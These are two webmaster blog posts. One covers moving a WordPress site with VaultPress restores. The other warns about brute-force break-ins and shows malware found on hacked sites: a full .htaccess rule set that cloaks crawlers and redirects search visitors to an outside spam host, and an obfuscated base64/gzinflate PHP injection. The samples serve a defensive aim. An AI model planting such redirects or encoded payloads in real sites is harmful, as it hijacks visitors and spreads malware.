Posted on

Moving Sites with VaultPress

VaultPress

I am going to be moving the main www.charlestonsw.com site soon and decided to try it with a new process.  I recently subscribed to VaultPress backups and thought I’d give that a try as a simple way to move the main WordPress site.   It should carry over all the WordPress directory files as well as the database settings.  My supporting apps living outside the WordPress world need to be brought over separately.

VaultPress has a new feature where you can restore your backup to an alternate location using an FTP/FTPS login that you provide.    Overall the process went smoothly with a few caveats.   VaultPress will likely resolve these issues soon, so be sure to check with them for any feature changes.   The issues I ran into and their fixes are noted here:

Home & SiteURL

The home and siteurl variables in the newly restored wp_options table of WordPress were wrong.   They were changed to my new site (wp.charlestonsw.com) that was my temporary placeholder, however the leading http:// was dropped off of both.   I prefer MySQL command line so I went there and ran this command:

mysql> update wp_options set option_value=’http://wp.charlestonsw.com’ where option_name=’home’ or option_name=’siteurl’;

.htaccess File

The VaultPress backup does not grab hidden files, like .htaccess.    I guess they assume this is already setup on the new site, however the new site permalink rules may not match the old site.  IMO this should be part of the backup/restore set.    There are two ways to fix this.   You can get your old .htaccess file “by hand” and restore it to the new server.    The other option is to look at the setting in our old admin panel for permalinks, then go to the new admin panel and select something DIFFERENT, save, then set it back.  This will re-create the necessary file assuming your directory permissions are correct.    This is usually a good idea when you change site URLs anyway as it clears the cache for a variety of plugins and internal “gears” for WordPress.

 

Thus far those are the only two “gotchas” I’ve found.   Of course I need to make sure I get my other databases and scripts moved, but I can use typical scp or rsync commands to pull server-to-server and a mysqldump/restore.  Luckily the other items are my internal reports only so it should cause less headaches if something goes missing for a day or two.

 

 

Posted on

Hackers Redirecting Websites (.htaccess)

A quick note to fellow webmasters out there as well as business owners running websites.   We have seen a recent rash of brute force hacking attempts on our servers and our client’s servers.   There have been several successful brute force break-ins in the past 3 months.   Below are a couple of things to look for and some best practices in keeping your site and your data secure.

Best Practices

The following best practices will help thwart many of  the attempts to hack into your account using a brute force “cracker”.

Do Not Share Your Password

Do not share your passwords with anyone.  If you have a vendor you need to work with or an employee that needs access, create a specific login for them with their own passwords.

Do Not Dole Out Access Easily

Before creating a new account with access to your server first ask yourself if the person truly needs access.   If this is a limited one-time request consider setting up a generic vendor account that you re-use.  Change the password as soon as they are done with it.  Never allow more than one person/vendor/client use the account a time.

Use A Strong Password

This cannot be emphasized enough.  Do NOT use simple passwords.  Do not use passwords based on a single dictionary word.  DO use passwords with punctuation and capitalization.   The most common password is “password” or “password1”.  Brute force only works if you are using bad passwords.

Try using something like a jumbled phrase with special character replacements, even MyP@ssW0rd! is a much better than 90% of the passwords people use.    Get creative “IDon’tLikeMilk!” or “DoYouLikeMilk2?” are fairly easy to remember but hard for brute force bots to guess.

Footprints Left By Hackers

Most hackers have little interest in your data or in doing something directly malicious to your site.   The most prevalent reason to hack a site is to either distribute a virus to site visitors or to earn revenue form “pay per click” programs like Google Adsense.

Most often this means adding code to your site while keeping your site functional.  It does them no good if the site breaks.  They want people visiting your site while a program is downloaded to their browser behind-the-scenes or they are redirected to a site they didn’t intend to visit.  Some of the hacks even pop-under a browser window with an ad, click the ad, then close the window before you see it… earning the hacker 25-cents in the process.

.htaccess Modification

This is one we’ve seen a few times, the .htaccess file on your server redirects a number of special file requests to a site they get paid to send traffic to.

<IfModule prefork.c>
RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^GET$
RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(google\.|yahoo\.|bing\.|msn\.|ask\.|excite\.|altavista\.|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.|lycos\.|metacrawler\.|mail\.|dogpile\?).*$ [NC]
RewriteCond %{HTTP_REFERER} !^.*(imgres\?q).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(bing|Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Diagnostics|DTAAgent|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|Fuck\sYou|Google).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Mac\_PPC|Mac\s10|Mac\sOS|macDN|Macintosh|Mediapartners|Megite|MetaProducts).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(WinHTTP|WinNT4|WordPress|WWWeasel|wwwster|yacy|Yahoo).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$ [NC]
RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png|.*jpeg|.*mpg|.*avi|.*zip|.*gz|.*tar|.*ico$ [NC]
RewriteCond %{HTTP_COOKIE} !^.*ADb.*$ [NC]
RewriteCond %{HTTP_USER_AGENT} .*Windows.* [NC]
RewriteCond %{HTTPS} ^off$
RewriteRule ^(.*)$ http://kike.therealtruthaboutaging.com/url?sa=t&source=web&cd=15&ved=0vFu49G3C&url=http://%{HTTP_HOST}%{REQUEST_URI}&ei=2ZMoeqjO6K+yqY2OyVEw8J+1pw==&usg=M4kjonDdK-kwm0WO2JdBFM&sig2=HKhlYtbOgR6MTETnCv3UJQ [R=302,L,CO=ADb:36:%{HTTP_HOST}:11060:/:0:HttpOnly]
</IfModule>
#5fc0e7448401802b00b0ad059685814b08cb5bd44015bae3c857ee73

index.php / index.htm modification

Here the hacker installs a binary representation of PHP or JavaScript commands into your web page.  This runs a program on the visitors browser which, depending on the code, can do any number of things from forcing a program download to adding a tracking cookie, to taking over the users search bar.  Some of these can be very nasty, others are less so and do relatively harmless (but annoying) browser redirection.

  <? require ("the_real_header.php");
#d93065#
echo(gzinflate(base64_decode("tVVNc5swEP0t5WKoBxcJ9MEo6qE59dwj44MHY2czjnGB2pNk8t+7WoFjJ9jNdCYDYlbS6u3b1RO6acsGdt330qYxM2BjPi0NrMLdommrn9suDJJgGjBsHFsaRNZanUZd8/j8o6431WIbRkWwa+qu7h53VTCf/X4pF115F1br6rBul9Ezoh1gu6wPs2Vd/nmotl20ssUkThm4JgVIDrGGBGQCioHIQSmQOUgGCkck4JNSTwLHYe3s03klgEvQDLIMhHLOqSaDfBKIEVQ7aAyAXtjFAQbok6KlU4i5goHPKyeVvYKgnaAvy898tXDEHRvtSKCB3TG8i4mp3EFjPNcjrphjMkIgpghuJAdOOciMcseXA8NZfCSNujX0oqG5C5K5wIoIMDIpOiMCnIC4Q3Qxcort2WV9pBxL5adxSPrypH38tx6KUtGs3yY/rTSlKNxXkC11nzR6Mo9LYd1L1cFKIylHVwzlEdRNnD9mJnwsX3vV148d5cEpQ9wNQpK0lB8HkBPnrtBqpNQ4g7swutknXbeIKinyM3axviyfEWkoSgbn3To6B9xX+qJkhJcMo3WU9eihINmP6Ij5zCQJQwzHSgxayvo9OpaUcI7SQzv7HPGdsTqVkPyHfI6n4Y2C4muIF6TlsS6p6xriqew8ir7OYJDkuPMHt+X8tA6b05/G/wB8f77HMD/+e/u8/7Yk+XOSEOGhD9LqZUDnJ3HJjxzjybxI5rN2t4EunMAkMnsbVHu83hbYNoF5wRtrH1XW31rFfm4OdmVaW8xNY391DWzXZlU3oRFSfLFgYGpZ9HyPVmvbaVMEK8RpsNUPt/i9Wzj7tl7i7Rgeivv5VzbNkqgP82Rb4+OFT5G5+dbfx38B")));
#/d93065#
?>

Summary

We hope that by getting this information online people start to learn a bit more about site security.   Insecure sites not only slow down the browser and are a detriment to the overall user experience, they can have much larger far-reaching affects that people don’t even think of.   One of the larger terrorist groups was found to be partly funded by Internet hacks like these.  25-cents-at-a-time clicks added up to over $1M that went straight into the terrorist network.  Now that’s a lot of clicks!  Imagine if they used this for a good cause… donate food or shelter to people in need, but that is a story for another site.

In the meantime, secure your site, remove the hacks, and create a better experience for your visitors.